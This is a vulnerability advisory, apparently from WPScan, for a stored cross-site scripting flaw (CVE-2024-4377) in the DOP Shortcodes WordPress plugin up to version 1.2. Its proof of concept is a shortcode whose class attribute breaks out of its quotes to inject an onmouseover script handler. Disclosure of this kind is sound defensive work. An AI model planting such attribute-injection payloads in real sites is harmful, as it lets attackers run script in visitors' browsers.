Lucene search
Bob MatyasWPVDB-ID:778CEBEC-BDBB-4538-9518-C5BD50F76961HistoryMay 31, 2024 - 12:00 a.m.
DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-05-3100:00:00
Bob Matyas
wpscan.com
1
dop shortcodes
contributor role
stored xss
shortcode.
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
PoC
Add the following shortcode to a post: [dopaccordions class='wp-block-search__button" onmouseover="alert(/XSS/)"'] [dopaccordion title="Title 1"]text[/dopaccordion] [dopaccordion title="Title 2"]text[/dopaccordion] [dopaccordion title="Title 3"]text[/dopaccordion] [/dopaccordions] Move your mouse over the accordion to see the XSS
Related
nvd
nvd
CVE-2024-4377
2024-06-21 06:15:11
cve
cve
CVE-2024-4377
2024-06-21 06:15:11
wpexploit
wpexploit
DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-05-31 00:00:00
cvelist
cvelist
CVE-2024-4377 DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode
2024-06-21 06:00:03
wordfence
wordfence
5.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPVDB-ID:778CEBEC-BDBB-4538-9518-C5BD50F76961